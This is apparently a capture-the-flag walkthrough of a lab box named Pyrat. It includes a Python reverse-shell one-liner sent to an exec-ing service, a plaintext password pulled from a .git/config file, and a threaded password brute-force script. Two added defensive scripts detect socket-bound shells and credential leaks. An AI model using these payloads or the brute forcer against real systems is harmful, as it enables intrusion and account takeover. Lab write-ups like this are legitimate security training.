kali:192.168.56.104
Target: 192.168.56.123
Port scan
# nmap 192.168.56.123
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 15:36 CST
Nmap scan report for 192.168.56.123
Host is up (0.00040s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8000/tcp open http-alt
MAC Address: 08:00:27:B2:CD:3D (Oracle VirtualBox virtual NIC)
Two ports are open: 22 and 8000.
Look at 8000 first.
Try a basic connection.
After connecting with nc, testing showed that Python statements could be executed.
Get a reverse shell.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.104",4567));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
# nc 192.168.56.123 8000
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.104",4567));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
# nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.123] 35634
bash: /root/.bashrc: Permission denied
www-data@Pyrat:~$ /usr/bin/script -qc /bin/bash /dev/null
/usr/bin/script -qc /bin/bash /dev/null
bash: /root/.bashrc: Permission denied
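From the defender's side, as an added example that is not part of the original writeup: the payload above works by dup2'ing a connected socket onto fds 0, 1 and 2, which leaves a trace in /proc. The script classifies a process's fd table and walks /proc for processes whose entire stdio is a socket; the fd tables used to check it are constructed, and the logic is mine, not the box's or the writeup's.

```python
import os
import re

SOCKET_RE = re.compile(r"^socket:\[\d+\]$")  # readlink() form of a socket fd under /proc
STDIO_FDS = ("0", "1", "2")

def is_socket_target(target):
    """True if a /proc/<pid>/fd/N link target names a socket."""
    return bool(SOCKET_RE.match(target))

def classify_fds(fd_targets):
    """fd_targets maps fd number (str) -> readlink target. Returns
    'reverse-shell-like' when stdin, stdout and stderr are all sockets,
    'partial' when only some are, 'normal' otherwise."""
    hits = [fd for fd in STDIO_FDS if is_socket_target(fd_targets.get(fd, ""))]
    if len(hits) == len(STDIO_FDS):
        return "reverse-shell-like"
    return "partial" if hits else "normal"

def read_fd_targets(pid):
    """Read the fd symlinks of one live process (Linux /proc only)."""
    fd_dir = f"/proc/{pid}/fd"
    targets = {}
    for fd in os.listdir(fd_dir):
        try:
            targets[fd] = os.readlink(os.path.join(fd_dir, fd))
        except OSError:
            pass  # fd closed between listdir and readlink
    return targets

def scan_proc():
    """Return [(pid, cmdline)] for processes whose whole stdio sits on sockets.
    In the session above that is the python process that called dup2 (the bash
    under pty.spawn sits on a pty slave). Socket-activated daemons match too,
    so treat a hit as a triage lead, not a verdict."""
    flagged = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            targets = read_fd_targets(pid)
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue  # process exited or is not ours to inspect
        if classify_fds(targets) == "reverse-shell-like":
            flagged.append((pid, cmdline))
    return flagged

if __name__ == "__main__":
    for pid, cmd in scan_proc():
        print(f"pid {pid}: {cmd}")
```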
No SUID privilege escalation either.
www-data@Pyrat:/tmp$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount
After going through the files, the password of the user think turned up in /opt/dev/.git/config.
www-data@Pyrat:/opt/dev/.git$ cat config
cat config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[user]
name = Jose Mario
email = josemlwdf@github.com
[credential]
helper = cache --timeout=3600
[credential "https://github.com"]
username = think
password = _TH1NKINGPirate$_
think/_TH1NKINGPirate$_
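As an added example (not the writeup's or the project's code): a scan for the leak pattern found above, a [credential "..."] section in .git/config holding a plaintext password. It parses git's INI-like config, reports which sensitive keys a credential section carries without echoing their values, and walks a tree for .git/config files; the SAMPLE config is constructed with a placeholder secret in place of the real one.

```python
import os
import re

SECTION_RE = re.compile(r'^\s*\[([^\s"\]]+)(?:\s+"([^"]*)")?\]\s*$')
KEY_RE = re.compile(r'^\s*([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*?)\s*$')
SENSITIVE_KEYS = {"password", "token"}  # values that never belong in .git/config

# Constructed sample with the same [credential] layout as the config found on the
# box; the secret is a placeholder, not the real password.
SAMPLE = """[core]
\trepositoryformatversion = 0
[credential]
\thelper = cache --timeout=3600
[credential "https://github.com"]
\tusername = think
\tpassword = placeholder-secret
"""

def parse_git_config(text):
    """Parse git's INI-like config into {(section, subsection): {key: value}}."""
    result, current = {}, None
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith(("#", ";")):
            continue
        if m := SECTION_RE.match(line):  # e.g. [credential "https://github.com"]
            current = (m.group(1).lower(), m.group(2))
            result.setdefault(current, {})
        elif (m := KEY_RE.match(line)) and current is not None:
            result[current][m.group(1).lower()] = m.group(2)
    return result

def find_credential_leaks(text):
    """One finding per [credential] section that stores a sensitive key."""
    findings = []
    for (section, subsection), keys in parse_git_config(text).items():
        leaked = sorted(k for k in keys if k in SENSITIVE_KEYS)
        if section == "credential" and leaked:
            findings.append({"url": subsection, "username": keys.get("username"), "keys": leaked})
    return findings

def scan_tree(root):
    """Walk a filesystem tree; report leaks with the secret itself redacted."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        if os.path.basename(dirpath) == ".git" and "config" in filenames:
            path = os.path.join(dirpath, "config")
            with open(path, errors="replace") as f:
                hits += [(path, h["url"], h["username"], h["keys"]) for h in find_credential_leaks(f.read())]
    return hits
```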
# ssh think@192.168.56.123
think@192.168.56.123's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-150-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information disabled due to load higher than 1.0
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
You have mail.
Last login: Thu Jun 15 12:09:31 2023 from 192.168.204.1
think@Pyrat:~$
User access obtained.
The mailbox has a hint.
think@Pyrat:/var/mail$ cat think
From root@pyrat Thu Jun 15 09:08:55 2023
Return-Path: <root@pyrat>
X-Original-To: think@pyrat
Delivered-To: think@pyrat
Received: by pyrat.localdomain (Postfix, from userid 0)
id 2E4312141; Thu, 15 Jun 2023 09:08:55 +0000 (UTC)
Subject: Hello
To: <think@pyrat>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20230615090855.2E4312141@pyrat.localdomain>
Date: Thu, 15 Jun 2023 09:08:55 +0000 (UTC)
From: Dbile Admen <root@pyrat>
Hello jose, I wanted to tell you that i have installed the RAT you posted on your GitHub page, i'll test it tonight so don't be scared if you see it running. Regards, Dbile Admen
There is something on GitHub.
A Python script was found there, but it was not much use.
At this point I just looked at the writeup, which gives a brute-force script.
import socket

# Define the server's address and port
server_address = ('192.168.56.123', 8000)  # Replace with your server's address and port


def send_word(word):
    # Create a socket object
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Connect to the server
        client_socket.connect(server_address)
        # Send the word to the server
        client_socket.sendall(word.encode())
        # Receive data from the server (if applicable)
        response = client_socket.recv(1024)
        response = response.decode()
        if word not in response:
            print(f"Sent: {word} | Received: {response}")
    except ConnectionRefusedError:
        print("Connection was refused. Is the server running?")
    finally:
        # Close the socket connection
        client_socket.close()


def read_wordlist_from_file(filename):
    with open(filename, 'r') as file:
        wordlist = file.readlines()
    return [word.strip() for word in wordlist]


# Path to the wordlist file
wordlist_filename = 'wordlist.txt'
# Read words from the file
words = read_wordlist_from_file(wordlist_filename)
# Iterate through the words and send each one to the server
for word in words:
    send_word(word)


def test_this(password):
    # Create a socket object
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Connect to the server
        client_socket.connect(server_address)
        # Send the word to the server
        client_socket.sendall('admin'.encode())
        # Receive data from the server (if applicable)
        response = client_socket.recv(1024)
        response = response.decode()
        if 'Password' in response:
            # sendall() takes bytes, so the password is encoded like the word above
            client_socket.sendall(password.encode())
            response = client_socket.recv(1024)
            response = response.decode()
            if 'Password' not in response:
                print('Password:', password)
    except ConnectionRefusedError:
        print("Connection was refused. Is the server running?")
    finally:
        # Close the socket connection
        client_socket.close()


def test_creds():
    from threading import Thread
    wordlist = '/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt'
    passwords = read_wordlist_from_file(wordlist)
    threads = []
    for password in passwords:
        thread = Thread(target=test_this, args=(password, ))
        thread.start()
        threads.append(thread)
        # Run at most 30 attempts at a time, then wait for them to finish
        if len(threads) >= 30:
            for thread in threads:
                thread.join()
            threads = []


# Run the second part (the brute force)
test_creds()
The writeup gives two scripts; the second part is the brute force.
The brute force finally yields the password september.
Open a terminal or command prompt.
Run the following command to connect to the server:
nc <server_ip> <server_port>
Replace <server_ip> with the IP address of the server where the script is running and <server_port> with the port number specified in the script (8000 in this case).
After connecting, you can interact with the script using the following commands:
Admin: To access the admin functionality, type admin and press Enter. You will be prompted to enter a password. Enter the password and press Enter. If the password is correct, you will see the message "Welcome Admin!!! Type 'shell' to begin". You can then proceed to use the shell functionality.
Shell: To access the shell functionality, type shell and press Enter. This will spawn a shell on the server, allowing you to execute commands. You can enter any valid shell command, and the output will be displayed on your nc session.
Python Interactive: To execute python commands on the server just send your python commands and it will be passed to the exec function.
Note: Make sure to replace <server_ip> with the actual IP address of the server running the script.
Following the README's hints:
after connecting with nc, type admin, then the password, then shell to get root.
# nc 192.168.56.123 8000
admin
Password:
september
Welcome Admin!!! Type "shell" to begin
shell
# ls
ls
pyrat.py root.txt snap
# cat root.txt
cat root.txt
b***************